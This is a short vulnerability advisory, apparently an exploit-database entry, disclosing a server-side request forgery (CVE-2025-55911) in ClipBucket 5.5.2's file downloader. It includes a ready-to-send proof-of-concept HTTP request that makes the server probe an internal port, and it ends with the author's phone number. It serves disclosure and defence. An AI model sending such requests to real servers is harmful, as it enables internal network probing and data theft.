# Exploit Title: ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: 5.5.2 Build #90
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55911
## Vulnerability Description:
An authenticated user with regular permissions can exploit a Server-Side
Request Forgery (SSRF) vulnerability via the `file` parameter in
`actions/file_downloader.php`. By supplying a crafted URL, attackers can
force the server to make arbitrary HTTP requests to internal services or
external systems. This can lead to internal network enumeration, data
exfiltration, or pivoting attacks.
## PoC Request:
POST /upload/actions/file_downloader.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=validsession
file=http://127.0.0.1:3306/test.mp4
The server attempts to connect to the internal service (`127.0.0.1:3306`),
demonstrating SSRF.
## Impact:
- Internal service enumeration
- Potential metadata leakage
- Pivoting to internal systems
Regards,
Mukundsinh Solanki
+916355251151
